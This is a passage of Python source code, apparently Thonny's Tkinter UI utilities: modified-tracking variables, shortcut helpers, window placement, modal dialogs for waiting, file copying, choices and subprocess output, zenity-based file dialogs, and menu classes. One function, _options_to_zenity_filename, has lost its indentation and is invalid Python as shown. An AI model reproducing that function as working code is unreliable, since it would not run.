        if master is not None and not isinstance(master, (tk.Widget, tk.Wm)):
            raise TypeError("First positional argument 'master' must be None, Widget or Wm")
        super().__init__(master=master, value=value, name=name)

        self.modified = False
        self.modification_listener = modification_listener
        if sys.version_info < (3, 6):
            self.trace("w", self._on_write)
        else:
            self.trace_add("write", self._on_write)

    def _on_write(self, *args):
        self.modified = True
        if not self.modification_listener:
            return
        try:
            self.modification_listener()
        except Exception:
            # Otherwise whole process will be brought down,
            # because for some reason Tk tries to call non-existing method
            # on variable
            get_workbench().report_exception()
class EnhancedStringVar(EnhancedVar, tk.StringVar):
    # StringVar flavour of EnhancedVar (modification tracking + listener)
    pass
class EnhancedIntVar(EnhancedVar, tk.IntVar):
    # IntVar flavour of EnhancedVar (modification tracking + listener)
    pass
class EnhancedBooleanVar(EnhancedVar, tk.BooleanVar):
    # BooleanVar flavour of EnhancedVar (modification tracking + listener)
    pass
class EnhancedDoubleVar(EnhancedVar, tk.DoubleVar):
    # DoubleVar flavour of EnhancedVar (modification tracking + listener)
    pass
def create_string_var(value, modification_listener=None) -> EnhancedStringVar:
    """Make an EnhancedStringVar: a StringVar with a "modified" attribute
    telling whether it was written after creation."""
    return EnhancedStringVar(
        master=None, value=value, name=None, modification_listener=modification_listener
    )
def create_int_var(value, modification_listener=None) -> EnhancedIntVar:
    """Int counterpart of create_string_var."""
    return EnhancedIntVar(
        master=None, value=value, name=None, modification_listener=modification_listener
    )
def create_double_var(value, modification_listener=None) -> EnhancedDoubleVar:
    """Double counterpart of create_string_var."""
    return EnhancedDoubleVar(
        master=None, value=value, name=None, modification_listener=modification_listener
    )
def create_boolean_var(value, modification_listener=None) -> EnhancedBooleanVar:
    """Boolean counterpart of create_string_var."""
    return EnhancedBooleanVar(
        master=None, value=value, name=None, modification_listener=modification_listener
    )
def shift_is_pressed(event_state):
    """Tell whether the Shift modifier bit is set in a Tk event state.

    http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
    http://stackoverflow.com/q/32426250/261181
    """
    SHIFT_MASK = 0x0001
    return event_state & SHIFT_MASK
def control_is_pressed(event_state):
    """Tell whether the Control modifier bit is set in a Tk event state.

    http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
    http://stackoverflow.com/q/32426250/261181
    """
    CONTROL_MASK = 0x0004
    return event_state & CONTROL_MASK
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
    """Convert a binding sequence such as "<Control-c>" into (event_state, keycode).

    Returns None for anything other than a single latin letter with
    Control or Control+Shift modifiers.  Needed for remembering handlers
    of shortcuts which require different treatment on non-latin keyboards.
    """
    if sequence[0] != "<":
        return None

    parts = sequence.strip("<").strip(">").split("-")
    # support only latin letters for now
    if parts[-1].lower() not in set("abcdefghijklmnopqrstuvwxyz"):
        return None

    letter = parts.pop(-1)
    for noise in ("Key", "key"):
        if noise in parts:
            parts.remove(noise)

    modifiers = {part.lower() for part in parts}
    if letter.isupper():
        # uppercase letter implies Shift
        modifiers.add("shift")

    if modifiers not in [{"control"}, {"control", "shift"}]:
        # don't support other combinations for now
        return None

    # http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
    # https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
    modifier_bits = {"shift": 0x0001, "control": 0x0004}
    event_state = 0
    for modifier in modifiers:
        if modifier not in modifier_bits:
            # unsupported modifier
            return None
        event_state |= modifier_bits[modifier]

    # for latin letters keycode is same as its ascii code
    return (event_state, ord(letter.upper()))
def select_sequence(win_version, mac_version, linux_version=None):
    """Pick the platform-appropriate binding sequence.

    Uses *win_version* as fallback on Linux without *linux_version*
    (and on unrecognized platforms).
    """
    if running_on_windows():
        return win_version
    if running_on_mac_os():
        return mac_version
    if running_on_linux() and linux_version:
        return linux_version
    return win_version
def try_remove_linenumbers(text, master):
    """If *text* looks numbered, offer to strip the line numbers.

    Returns the possibly cleaned text; on any error the original text
    is returned unchanged.
    """
    try:
        if not has_line_numbers(text):
            return text
        agreed = messagebox.askyesno(
            title="Remove linenumbers",
            message="Do you want to remove linenumbers from pasted text?",
            default=messagebox.YES,
        )
        return remove_line_numbers(text) if agreed else text
    except Exception:
        traceback.print_exc()
        return text
def has_line_numbers(text):
    """Heuristic: True when *text* has 3+ lines and every line starts with a number."""
    lines = text.splitlines()
    if len(lines) <= 2:
        return False
    return all(len(split_after_line_number(line)) == 2 for line in lines)
def split_after_line_number(s):
    """Split a leading line number off *s*.

    "  12. rest" -> ["  12.", " rest"]; returns [s] when there is no number.
    """
    parts = re.split(r"(^\s*\d+\.?)", s)
    if len(parts) == 1:
        # no leading line number found
        return parts
    assert len(parts) == 3 and parts[0] == ""
    return parts[1:]
def remove_line_numbers(s):
    """Strip leading line numbers from every line and dedent the result.

    Returns *s* unchanged when any line lacks a number.
    """
    cleaned = []
    for line in s.splitlines():
        parts = split_after_line_number(line)
        if len(parts) != 2:
            # at least one line has no number -- leave the text alone
            return s
        cleaned.append(parts[1])

    return textwrap.dedent("\n".join(cleaned) + "\n")
def center_window(win, master=None):
    # Deprecated name, kept for backward compatibility -- use assign_geometry.
    return assign_geometry(win, master)
def assign_geometry(win, master=None, min_left=0, min_top=0):
    """Size and position *win* centered over *master*.

    A previously saved size (workbench option) is applied explicitly;
    otherwise only the position is set and the window keeps its natural
    size (with 600x400 fallbacks when measurement isn't reliable yet).
    """
    if master is None:
        master = tk._default_root

    saved_size = get_workbench().get_option(get_size_option_name(win))
    if saved_size:
        width, height = saved_size
        use_explicit_size = True
    else:
        use_explicit_size = False
        width, height = 600, 400  # fallbacks
        # need to wait until size is computed
        # (unfortunately this causes dialog to jump)
        if not getattr(master, "initializing", False):
            # positions are only reliable once the main window is in mainloop
            if not running_on_linux():
                # better to avoid in Linux because it causes ugly jump
                win.update_idletasks()
            # looks like it doesn't take window border into account
            measured_width = win.winfo_width()
            measured_height = win.winfo_height()
            if measured_width >= 10:
                # measurement looks sane -- use it
                width, height = measured_width, measured_height

    left = max(master.winfo_rootx() + master.winfo_width() // 2 - width // 2, min_left)
    top = max(master.winfo_rooty() + master.winfo_height() // 2 - height // 2, min_top)

    if use_explicit_size:
        win.geometry("%dx%d+%d+%d" % (width, height, left, top))
    else:
        win.geometry("+%d+%d" % (left, top))
class WaitingDialog(CommonDialog):
    """Modal "please wait" dialog polling a multiprocessing AsyncResult.

    Closes itself when the result is ready.  If *timeout* seconds pass
    first, TimeoutError is raised from the poll callback.
    """

    def __init__(self, master, async_result, description, title="Please wait!", timeout=None):
        self._async_result = async_result
        super().__init__(master)
        if misc_utils.running_on_mac_os():
            self.configure(background="systemSheetBackground")
        self.title(title)
        self.resizable(height=tk.FALSE, width=tk.FALSE)
        # self.protocol("WM_DELETE_WINDOW", self._close)
        self.desc_label = ttk.Label(self, text=description, wraplength=300)
        self.desc_label.grid(padx=20, pady=20)

        self.update_idletasks()

        self.timeout = timeout
        self.start_time = time.time()
        self.after(500, self._poll)

    def _poll(self):
        # runs on the UI thread every 500 ms
        if self._async_result.ready():
            self._close()
        elif self.timeout and time.time() - self.start_time > self.timeout:
            # NOTE(review): raised inside an `after` callback, so it surfaces
            # via Tk's callback exception reporting, not to the original caller
            raise TimeoutError()
        else:
            self.after(500, self._poll)
            # append a dot as a simple progress indicator
            self.desc_label["text"] = self.desc_label["text"] + "."

    def _close(self):
        self.destroy()
def run_with_waiting_dialog(master, action, args=(), description="Working"):
    """Run action(*args) in a background thread behind a modal WaitingDialog.

    Returns the action's result (re-raising its exception, if any).
    http://stackoverflow.com/a/14299004/261181
    """
    from multiprocessing.pool import ThreadPool

    pool = ThreadPool(processes=1)
    async_result = pool.apply_async(action, args)
    dialog = WaitingDialog(master, async_result, description=description)
    show_dialog(dialog, master)
    return async_result.get()
class FileCopyDialog(CommonDialog):
    """Modal dialog copying *source* to *destination* with a progress bar.

    The copy runs in a daemon thread; the UI thread polls the shared byte
    counter every 100 ms.  `_cancelled` records a user abort (NB: the
    worker thread itself is not interrupted -- it simply dies with the
    process since it is a daemon).
    """

    def __init__(self, master, source, destination, description=None, fsync=True):
        self._source = source
        self._destination = destination
        self._old_bytes_copied = 0  # last value already reflected in the bar
        self._bytes_copied = 0  # written by worker thread, read by UI thread
        self._fsync = fsync  # fsync after each chunk -- presumably for removable media; confirm
        self._done = False
        self._cancelled = False
        self._closed = False

        super().__init__(master)

        main_frame = ttk.Frame(self)  # To get styled background
        main_frame.grid(row=0, column=0, sticky="nsew")
        self.rowconfigure(0, weight=1)
        self.columnconfigure(0, weight=1)

        self.title(tr("Copying"))

        if description is None:
            description = tr("Copying\n %s\nto\n %s") % (source, destination)
        label = ttk.Label(main_frame, text=description)
        label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)

        self._bar = ttk.Progressbar(main_frame, maximum=os.path.getsize(source), length=200)
        self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)

        self._cancel_button = ttk.Button(main_frame, text=tr("Cancel"), command=self._cancel)
        self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
        self._bar.focus_set()

        main_frame.columnconfigure(0, weight=1)

        self._update_progress()

        self.bind("<Escape>", self._cancel, True)  # escape-close only if process has completed
        self.protocol("WM_DELETE_WINDOW", self._cancel)
        self._start()

    def _start(self):
        """Launch the copy in a daemon thread which updates self._bytes_copied."""

        def work():
            self._copy_progess = 0  # NOTE(review): apparently unused (and misspelled)

            with open(self._source, "rb") as fsrc:
                with open(self._destination, "wb") as fdst:
                    while True:
                        buf = fsrc.read(16 * 1024)
                        if not buf:
                            break

                        fdst.write(buf)
                        fdst.flush()
                        if self._fsync:
                            os.fsync(fdst)
                        self._bytes_copied += len(buf)

            self._done = True

        threading.Thread(target=work, daemon=True).start()

    def _update_progress(self):
        # UI-thread poll: advance the bar by the bytes copied since last tick
        if self._done:
            if not self._closed:
                self._close()
            return

        self._bar.step(self._bytes_copied - self._old_bytes_copied)
        self._old_bytes_copied = self._bytes_copied

        self.after(100, self._update_progress)

    def _close(self):
        self.destroy()
        self._closed = True

    def _cancel(self, event=None):
        self._cancelled = True
        self._close()
class ChoiceDialog(CommonDialogEx):
    """Modal dialog asking the user to pick one of the given choices.

    After show_dialog() returns, `result` holds the selected choice
    string, or None when cancelled / nothing selected.
    """

    def __init__(
        self,
        master=None,
        title="Choose one",
        question: str = "Choose one:",
        choices=[],
        initial_choice_index=None,
    ) -> None:
        super().__init__(master=master)
        self.title(title)
        self.resizable(False, False)

        self.main_frame.columnconfigure(0, weight=1)

        row = 0
        question_label = ttk.Label(self.main_frame, text=question)
        question_label.grid(row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20)
        row += 1

        # NB! "" must be passed as keyword: modern tkinter interprets the first
        # positional argument of StringVar as *master*, not *value*.
        self.var = tk.StringVar(value="")
        if initial_choice_index is not None:
            self.var.set(choices[initial_choice_index])
        for choice in choices:
            rb = ttk.Radiobutton(self.main_frame, text=choice, variable=self.var, value=choice)
            rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
            row += 1

        ok_button = ttk.Button(self.main_frame, text="OK", command=self._ok, default="active")
        ok_button.grid(row=row, column=0, sticky="e", pady=20)
        cancel_button = ttk.Button(self.main_frame, text="Cancel", command=self._cancel)
        cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)

        self.bind("<Escape>", self._cancel, True)
        self.bind("<Return>", self._ok, True)
        self.protocol("WM_DELETE_WINDOW", self._cancel)

    def _ok(self):
        # empty selection is reported as None
        self.result = self.var.get() or None
        self.destroy()

    def _cancel(self):
        self.result = None
        self.destroy()
class LongTextDialog(CommonDialog):
    """Dialog showing a long read-only text with a "Copy to clipboard" button."""

    def __init__(self, title, text_content, parent=None):
        if parent is None:
            parent = tk._default_root

        super().__init__(master=parent)
        self.title(title)

        main_frame = ttk.Frame(self)
        main_frame.grid(row=0, column=0, sticky="nsew")
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)

        default_font = tk.font.nametofont("TkDefaultFont")
        self._text = tktextext.TextFrame(
            main_frame,
            read_only=True,
            wrap="none",
            font=default_font,
            width=80,
            height=10,
            relief="sunken",
            borderwidth=1,
        )
        self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
        self._text.text.direct_insert("1.0", text_content)
        self._text.text.see("1.0")

        copy_button = ttk.Button(
            main_frame, command=self._copy, text=tr("Copy to clipboard"), width=20
        )
        copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))

        close_button = ttk.Button(
            main_frame, command=self._close, text=tr("Close"), default="active"
        )
        close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
        close_button.focus_set()

        main_frame.columnconfigure(0, weight=1)
        main_frame.rowconfigure(1, weight=1)

        self.protocol("WM_DELETE_WINDOW", self._close)
        self.bind("<Escape>", self._close, True)

    def _copy(self, event=None):
        # copy the whole content to the clipboard
        self.clipboard_clear()
        self.clipboard_append(self._text.text.get("1.0", "end"))

    def _close(self, event=None):
        self.destroy()
def ask_one_from_choices(
    master=None,
    title="Choose one",
    question: str = "Choose one:",
    choices=[],
    initial_choice_index=None,
):
    """Show a modal ChoiceDialog and return the selected choice (or None)."""
    dialog = ChoiceDialog(master, title, question, choices, initial_choice_index)
    show_dialog(dialog, master)
    return dialog.result
class SubprocessDialog(CommonDialog):
    """Shows incrementally the output of given subprocess.
    Allows cancelling"""

    # *proc* is expected to be a Popen with piped stdout (stderr optional);
    # streams are read as text (readline result is compared to "" and
    # concatenated to str attributes) -- presumably opened with
    # universal_newlines/encoding; confirm at call sites.

    def __init__(
        self, master, proc, title, long_description=None, autoclose=True, conclusion="Done."
    ):
        self._closed = False
        self._proc = proc
        self.stdout = ""  # accumulated stdout text
        self.stderr = ""  # accumulated stderr text
        self._stdout_thread = None
        self._stderr_thread = None
        self.returncode = None
        self.cancelled = False
        self._autoclose = autoclose
        self._event_queue = collections.deque()  # (stream_name, data) from reader threads
        self._conclusion = conclusion

        super().__init__(master)

        self.rowconfigure(0, weight=1)
        self.columnconfigure(0, weight=1)

        main_frame = ttk.Frame(self)  # To get styled background
        main_frame.grid(sticky="nsew")

        text_font = tk.font.nametofont("TkFixedFont").copy()
        text_font["size"] = int(text_font["size"] * 0.9)
        text_font["family"] = "Courier" if running_on_mac_os() else "Courier New"
        text_frame = tktextext.TextFrame(
            main_frame,
            read_only=True,
            horizontal_scrollbar=False,
            background=lookup_style_option("TFrame", "background"),
            font=text_font,
            wrap="word",
        )
        text_frame.grid(row=0, column=0, sticky=tk.NSEW, padx=15, pady=15)
        self.text = text_frame.text
        self.text["width"] = 60
        self.text["height"] = 7
        if long_description is not None:
            self.text.direct_insert("1.0", long_description + "\n\n")

        self.button = ttk.Button(main_frame, text=tr("Cancel"), command=self._close)
        self.button.grid(row=1, column=0, pady=(0, 15))

        main_frame.rowconfigure(0, weight=1)
        main_frame.columnconfigure(0, weight=1)

        self.title(title)

        if misc_utils.running_on_mac_os():
            self.configure(background="systemSheetBackground")

        # self.resizable(height=tk.FALSE, width=tk.FALSE)
        self.text.focus_set()

        self.bind(
            "<Escape>", self._close_if_done, True
        )  # escape-close only if process has completed
        self.protocol("WM_DELETE_WINDOW", self._close)
        self.update_idletasks()
        self._start_listening()

    def _start_listening(self):
        """Start reader thread(s) for the pipes and begin UI-thread polling."""

        def listen_stream(stream_name):
            # runs in a background thread: drains the pipe so the child
            # doesn't block on a full buffer, queueing data for the UI thread
            stream = getattr(self._proc, stream_name)
            while True:
                data = stream.readline()
                self._event_queue.append((stream_name, data))
                setattr(self, stream_name, getattr(self, stream_name) + data)
                if data == "":
                    # EOF
                    break

            self.returncode = self._proc.wait()

        self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
        self._stdout_thread.start()
        if self._proc.stderr is not None:
            self._stderr_thread = threading.Thread(
                target=listen_stream, args=["stderr"], daemon=True
            )
            self._stderr_thread.start()

        def poll_output_events():
            # runs on the UI thread via `after`: shows queued output chunks
            if self._closed:
                return

            while len(self._event_queue) > 0:
                stream_name, data = self._event_queue.popleft()
                self.text.direct_insert("end", data, tags=(stream_name,))
                self.text.see("end")

            self.returncode = self._proc.poll()
            # NOTE(review): works, but `is None` would be the idiomatic test
            if self.returncode == None:
                self.after(200, poll_output_events)
            else:
                self.button["text"] = tr("OK")
                self.button.focus_set()
                if self.returncode != 0:
                    self.text.direct_insert(
                        "end",
                        "\n\nProcess failed, return code: %s\n" % self.returncode,
                        ("stderr",),
                    )
                    self.update_idletasks()
                    self.text.see("end")
                elif self._autoclose:
                    self._close()
                else:
                    self.text.direct_insert("end", "\n\n" + self._conclusion)
                    self.update_idletasks()
                    self.text.see("end")

        poll_output_events()

    def _close_if_done(self, event):
        # Escape closes only when the process has finished
        if self._proc.poll() is not None:
            self._close(event)

    def _close(self, event=None):
        if self._proc.poll() is None:
            # still running -- confirm, then try to terminate it
            if messagebox.askyesno(
                tr("Cancel the process?"),
                tr("The process is still running.\nAre you sure you want to cancel?"),
                parent=None if running_on_mac_os() else self,
            ):
                # try gently first
                try:
                    if running_on_windows():
                        os.kill(
                            self._proc.pid, signal.CTRL_BREAK_EVENT  # pylint: disable=no-member
                        )
                    else:
                        os.kill(self._proc.pid, signal.SIGINT)

                    self._proc.wait(2)
                except subprocess.TimeoutExpired:
                    if self._proc.poll() is None:
                        # now let's be more concrete
                        self._proc.kill()

                self.cancelled = True
                # Wait for threads to finish
                self._stdout_thread.join(2)
                if self._stderr_thread is not None:
                    self._stderr_thread.join(2)

                # fetch output about cancelling
                while len(self._event_queue) > 0:
                    stream_name, data = self._event_queue.popleft()
                    self.text.direct_insert("end", data, tags=(stream_name,))
                self.text.direct_insert("end", "\n\nPROCESS CANCELLED")
                self.text.see("end")
            else:
                # user chose to keep it running -- dialog stays open
                return
        else:
            self._closed = True
            self.destroy()
def get_busy_cursor():
    """Name of the platform's busy-pointer cursor."""
    if running_on_windows():
        return "wait"
    if running_on_mac_os():
        return "spinning"
    return "watch"
def get_tk_version_str():
    """Full Tk patchlevel string, e.g. "8.6.12"."""
    root = tk._default_root
    return root.tk.call("info", "patchlevel")
def get_tk_version_info():
    """Tk patchlevel as a tuple of ints; unparsable components become 0."""

    def to_int(part):
        try:
            return int(part)
        except Exception:
            return 0

    return tuple(to_int(part) for part in get_tk_version_str().split("."))
def get_style_configuration(style_name, default=None):
    """Return the ttk configuration dict of *style_name*.

    Falls back to *default* -- a fresh empty dict when not given.
    (Previously the fallback was a shared mutable `default={}`, which a
    careless caller could mutate for everybody.)

    NB! style.configure seems to reuse the returned dict --
    don't change it without copying first.
    """
    style = ttk.Style()
    result = style.configure(style_name)
    if result is not None:
        return result
    # fresh dict per call, so mutations by the caller can't leak between calls
    return {} if default is None else default
def lookup_style_option(style_name, option_name, default=None):
    """Look up a ttk style option, converting "True"/"False" strings to bools."""
    style = ttk.Style()
    value = style.lookup(style_name, option_name)
    if value in [None, ""]:
        return default
    if value == "True":
        return True
    if value == "False":
        return False
    return value
def scale(value):
    """Scale *value* by the workbench's UI scaling factor."""
    workbench = get_workbench()
    return workbench.scale(value)
def open_path_in_system_file_manager(path):
    """Reveal *path* in Finder / xdg-open handler / Windows Explorer."""
    if running_on_mac_os():
        # http://stackoverflow.com/a/3520693/261181
        # -R doesn't allow showing hidden folders
        opener = "open"
    elif running_on_linux():
        opener = "xdg-open"
    else:
        assert running_on_windows()
        opener = "explorer"
    subprocess.Popen([opener, path])
def _get_dialog_provider():
    """Choose between tkinter.filedialog and Zenity (Linux, when installed)."""
    if platform.system() == "Linux":
        import shutil

        # prefer native-looking Zenity dialogs when the binary is available
        if shutil.which("zenity"):
            return _ZenityDialogProvider

    # fallback
    return filedialog
def asksaveasfilename(**options):
    """Platform-appropriate "save as" dialog.

    https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
    """
    _tweak_file_dialog_parent(options)
    provider = _get_dialog_provider()
    return provider.asksaveasfilename(**options)
def askopenfilename(**options):
    """Platform-appropriate single-file "open" dialog.

    https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
    """
    _tweak_file_dialog_parent(options)
    provider = _get_dialog_provider()
    return provider.askopenfilename(**options)
def askopenfilenames(**options):
    """Platform-appropriate multi-file "open" dialog.

    https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
    """
    _tweak_file_dialog_parent(options)
    provider = _get_dialog_provider()
    return provider.askopenfilenames(**options)
def askdirectory(**options):
    """Platform-appropriate directory chooser.

    https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
    """
    _tweak_file_dialog_parent(options)
    provider = _get_dialog_provider()
    return provider.askdirectory(**options)
def _tweak_file_dialog_parent(options):
    """Normalize master/parent entries of file-dialog *options* in place."""
    if running_on_mac_os():
        # used to require master/parent (https://bugs.python.org/issue34927)
        # but this is deprecated in Catalina (https://github.com/thonny/thonny/issues/840)
        options.pop("master", None)
        options.pop("parent", None)
    elif "parent" not in options:
        options["parent"] = options.get("master", tk._default_root)
class _ZenityDialogProvider:
    """File dialogs implemented with the `zenity` command-line tool.

    Partial drop-in replacement for tkinter.filedialog on Linux.
    # https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
    # http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
    # http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
    # another possibility is to use PyGobject: https://github.com/poulp/zenipy
    """

    @classmethod
    def askopenfilename(cls, **options):
        """Single-file open dialog; returns the path or None on cancel."""
        args = cls._convert_common_options("Open file", **options)
        return cls._call(args)

    @classmethod
    def askopenfilenames(cls, **options):
        """Multi-file open dialog; returns a list of paths ([] on cancel)."""
        args = cls._convert_common_options("Open files", **options)
        filenames = cls._call(args + ["--multiple"])
        if not filenames:
            # dialog was cancelled (or zenity failed); previously this
            # crashed with AttributeError on None.split
            return []
        return filenames.split("|")

    @classmethod
    def asksaveasfilename(cls, **options):
        """Save dialog; returns the chosen path (with defaultextension applied) or None."""
        args = cls._convert_common_options("Save as", **options)
        args.append("--save")
        if options.get("confirmoverwrite", True):
            args.append("--confirm-overwrite")

        filename = cls._call(args)
        if not filename:
            return None

        if "defaultextension" in options and "." not in os.path.basename(filename):
            filename += options["defaultextension"]

        return filename

    @classmethod
    def askdirectory(cls, **options):
        """Directory chooser; returns the path or None on cancel."""
        args = cls._convert_common_options("Select directory", **options)
        args.append("--directory")
        return cls._call(args)

    @classmethod
    def _convert_common_options(cls, default_title, **options):
        """Translate tkinter.filedialog-style options into zenity arguments."""
        args = ["--file-selection", "--title=%s" % options.get("title", default_title)]

        filename = _options_to_zenity_filename(options)
        if filename:
            args.append("--filename=%s" % filename)

        parent = options.get("parent", options.get("master", None))
        if parent is not None:
            args.append("--modal")
            args.append("--attach=%s" % hex(parent.winfo_id()))

        for desc, pattern in options.get("filetypes", ()):
            # zenity requires star before extension
            pattern = pattern.replace(" .", " *.")
            if pattern.startswith("."):
                pattern = "*" + pattern

            if pattern == "*.*":
                # ".*" was provided to make the pattern safe for Tk dialog
                # not required with Zenity
                pattern = "*"

            args.append("--file-filter=%s | %s" % (desc, pattern))

        return args

    @classmethod
    def _call(cls, args):
        """Run zenity; return its stdout (stripped) or None on non-zero exit."""
        args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
        result = subprocess.run(
            args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
        )
        if result.returncode == 0:
            return result.stdout.strip()
        else:
            # could check stderr, but it may contain irrelevant warnings
            return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
    registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
    """Register (handler, tester) under the (event_state, keycode) of *sequence*.

    No-op when the sequence can't be mapped (non-latin letter or
    unsupported modifiers).
    """
    key = sequence_to_event_state_and_keycode(sequence)
    if key is not None:
        registry.setdefault(key, []).append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
    """Invoke registered Ctrl+<latin letter> handlers for events coming
    from non-latin keyboards.

    See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
    """
    # only consider events with Control held
    if not event.state & 0x04:
        return

    if running_on_mac_os():
        return

    # consider only part of the state, because at least on Windows,
    # Ctrl-shortcuts' state has something extra
    simplified_state = 0x04 | (0x01 if shift_is_pressed(event.state) else 0x00)

    # print(simplified_state, event.keycode)
    key = (simplified_state, event.keycode)
    if key not in registry:
        return

    if event.keycode != ord(event.char) and event.keysym in (None, "??"):
        # keycode and char doesn't match,
        # this means non-latin keyboard
        for handler, tester in registry[key]:
            if tester is None or tester():
                handler()
def show_dialog(dlg, master=None, geometry=True, min_left=0, min_top=0):
    """Display dlg as a modal dialog over master and block until it closes.

    geometry may be True (position near master via assign_geometry), a Tk
    geometry string, or falsy (leave the dialog wherever it is). After the
    dialog closes, focus is restored to the previously focused widget.
    """
    # Dialog may already have been closed before this call was scheduled
    if getattr(dlg, "closed", False):
        return
    if master is None:
        master = tk._default_root
    get_workbench().event_generate("WindowFocusOut")
    # following order seems to give most smooth appearance
    focused_widget = master.focus_get()
    dlg.transient(master.winfo_toplevel())
    if geometry:
        # dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
        if isinstance(geometry, str):
            dlg.geometry(geometry)
        else:
            assign_geometry(dlg, master, min_left, min_top)
        # dlg.wm_deiconify()

    # grab_set may fail (e.g. another grab is active) — modality is best-effort
    try:
        dlg.grab_set()
    except TclError:
        pass

    dlg.lift()
    dlg.focus_set()
    master.winfo_toplevel().wait_window(dlg)
    dlg.grab_release()
    master.winfo_toplevel().lift()
    master.winfo_toplevel().focus_force()
    master.winfo_toplevel().grab_set()
    # NOTE(review): the toplevel grab is apparently only needed on non-macOS;
    # on macOS it is released immediately — confirm intent before changing
    if running_on_mac_os():
        master.winfo_toplevel().grab_release()

    if focused_widget is not None:
        try:
            focused_widget.focus_force()
        except TclError:
            # widget may have been destroyed while the dialog was open
            pass
def popen_with_ui_thread_callback(*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs):
    """Start a subprocess and call on_completion(proc, out_lines, err_lines)
    on the Tk UI thread once the process exits.

    stdout/stderr are drained by daemon threads; completion is detected by
    polling from the Tk event loop every poll_delay seconds.
    """
    if "encoding" not in Popen_kwargs:
        # Force UTF-8 on the child side so the captured text decodes consistently
        if "env" not in Popen_kwargs:
            Popen_kwargs["env"] = os.environ.copy()
        Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
        if sys.version_info >= (3, 6):
            Popen_kwargs["encoding"] = "utf-8"

    proc = subprocess.Popen(*Popen_args, **Popen_kwargs)

    # Need to read in thread in order to avoid blocking because
    # of full pipe buffer (see https://bugs.python.org/issue1256)
    out_lines = []
    err_lines = []

    def read_stream(stream, target_list):
        # Runs in a daemon thread: collect lines until EOF
        while True:
            line = stream.readline()
            if line:
                target_list.append(line)
            else:
                break

    t_out = threading.Thread(target=read_stream, daemon=True, args=(proc.stdout, out_lines))
    t_err = threading.Thread(target=read_stream, daemon=True, args=(proc.stderr, err_lines))
    t_out.start()
    t_err.start()

    def poll():
        if proc.poll() is not None:
            # Process finished — give the reader threads a moment to drain
            # any remaining buffered output before reporting
            t_out.join(3)
            t_err.join(3)
            on_completion(proc, out_lines, err_lines)
            return

        tk._default_root.after(int(poll_delay * 1000), poll)

    poll()
    return proc
class MenuEx(tk.Menu):
    """tk.Menu whose items can be enabled/disabled via optional "tester"
    callbacks passed to add/add_command.

    Testers are keyed by item label and evaluated each time the menu is
    posted; an item with a tester returning falsy is disabled.
    """

    def __init__(self, target):
        self._testers = {}  # maps item label data -> tester callable (or None)
        super().__init__(
            target, tearoff=False, postcommand=self.on_post, **get_style_configuration("Menu")
        )

    def on_post(self, *args):
        self.update_item_availability()

    def update_item_availability(self):
        """Enable or disable every item according to its registered tester."""
        last_index = self.index("end")
        if last_index is None:
            # Empty menu: index("end") returns None and the unguarded
            # range(None + 1) would raise TypeError.
            return
        for i in range(last_index + 1):
            item_data = self.entryconfigure(i)
            if "label" in item_data:
                tester = self._testers.get(item_data["label"])
                if tester and not tester():
                    self.entryconfigure(i, state=tk.DISABLED)
                else:
                    self.entryconfigure(i, state=tk.NORMAL)

    def add(self, itemType, cnf=None, **kw):
        # "tester" is a custom option and must be stripped before delegating
        # to tk.Menu.add. Default changed from the mutable {} to None
        # (shared-default pitfall); behavior is identical because an empty
        # cnf falls back to kw anyway.
        cnf = cnf or kw
        tester = cnf.get("tester")
        if "tester" in cnf:
            del cnf["tester"]
        super().add(itemType, cnf)
        itemdata = self.entryconfigure(self.index("end"))
        labeldata = itemdata.get("label")
        if labeldata:
            self._testers[labeldata] = tester
class TextMenu(MenuEx):
    """Context menu offering the standard clipboard operations for a text widget."""

    def __init__(self, target):
        self.text = target
        MenuEx.__init__(self, target)
        self.add_basic_items()
        self.add_extra_items()

    def add_basic_items(self):
        # Clipboard commands, each guarded by a tester controlling availability
        self.add_command(label=tr("Cut"), command=self.on_cut, tester=self.can_cut)
        self.add_command(label=tr("Copy"), command=self.on_copy, tester=self.can_copy)
        self.add_command(label=tr("Paste"), command=self.on_paste, tester=self.can_paste)

    def add_extra_items(self):
        # Extension point for subclasses; by default appends "Select All"
        self.add_separator()
        self.add_command(label=tr("Select All"), command=self.on_select_all)

    def on_cut(self):
        self._fire("<<Cut>>")

    def on_copy(self):
        self._fire("<<Copy>>")

    def on_paste(self):
        self._fire("<<Paste>>")

    def on_select_all(self):
        self._fire("<<SelectAll>>")

